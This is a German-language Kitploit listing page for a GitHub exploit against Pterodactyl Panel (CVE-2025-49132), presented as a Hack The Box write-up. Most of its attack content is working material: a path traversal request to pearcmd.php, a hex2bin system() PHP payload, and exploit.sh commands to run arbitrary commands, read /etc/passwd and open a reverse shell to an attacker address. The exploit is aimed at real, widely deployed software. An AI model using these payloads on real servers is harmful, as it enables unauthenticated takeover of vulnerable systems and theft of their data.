Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132_HTB_SEASON10 — Nicht authentifizierter RCE-Exploit für das Pterodactyl Panel (CVE-2025-49132), der Path Traversal mit PEAR Command Injection kombiniert, um beliebigen PHP-Code auf angreifbaren Servern auszuführen. | Kitploit
Tools/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Nicht authentifizierter RCE-Exploit für das Pterodactyl Panel (CVE-2025-49132), der Path Traversal mit PEAR Command Injection kombiniert, um beliebigen PHP-Code auf angreifbaren Servern auszuführen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

CVE-2025-49132 - Pterodactyl Panel RCE Exploit

HTB Season 10 - Pterodactyl Machine Writeup

Übersicht

Ziel: Pterodactyl HTB-Maschine (Mittlerer Schwierigkeitsgrad)
CVE: CVE-2025-49132
Schweregrad: Kritisch (CVSS 9.8)
Angriffsart: Nicht authentifizierte Remote-Codeausführung
Betroffen: Pterodactyl Panel < v1.11.11

Diese Exploit-Kette kombiniert:

  1. Path Traversal im Locale-Übersetzungssystem
  2. PEAR-Befehlseinschleusung über pearcmd.php
  3. PHP-Codeausführung durch Dateischreiben + Einbinden

Der Fehler

Der /locales/locale.json-Endpunkt des Pterodactyl-Panels ermöglicht Path Traversal über den Parameter locale:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

Dies kann mit PEARs pearcmd.php kombiniert werden, um:

  1. Beliebige PHP-Dateien nach /tmp zu schreiben
  2. Diese über eine weitere Anfrage auszuführen

Warum es funktioniert

PEAR (PHP Extension and Application Repository) verfügt über ein CLI-Tool (pearcmd.php), das:

  • Befehle über URL-Parameter akzeptiert (eigentlich nur für die CLI vorgesehen)
  • Einen config-create-Befehl hat, der Dateien schreibt
  • KEINE Authentifizierung hat, wenn es über das Web aufgerufen wird

Die Exploit-Kette:

root@kitploit:~
Path Traversal → pearcmd.php laden → PHP via config-create einschleusen → Schädliches PHP ausführen

Der Hex2bin()-Trick

Befehle werden mit hex2bin() hex-codiert, um folgendes zu umgehen:

  • URL-Codierungsprobleme
  • Sonderzeichenfilter
  • Probleme beim Parsen von Nginx/PHP

Beispiel:

root@kitploit:~
Befehl: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

Remote-Codeausführung

Methode: Mit bereitgestelltem exploit.sh

root@kitploit:~
chmod +x exploit.sh

# Benutzer-Flag abrufen
./exploit.sh flag

# Befehle ausführen
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse Shell
nc -lvnp 4444  # Auf Angreifermaschine
./exploit.sh shell 10.10.14.21 4444

Referenzen

CVE & Exploits

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Technische Ressourcen

  • Pterodactyl Panel Docs
  • PEAR-Dokumentation
  • OWASP Path Traversal

Tool herunterladen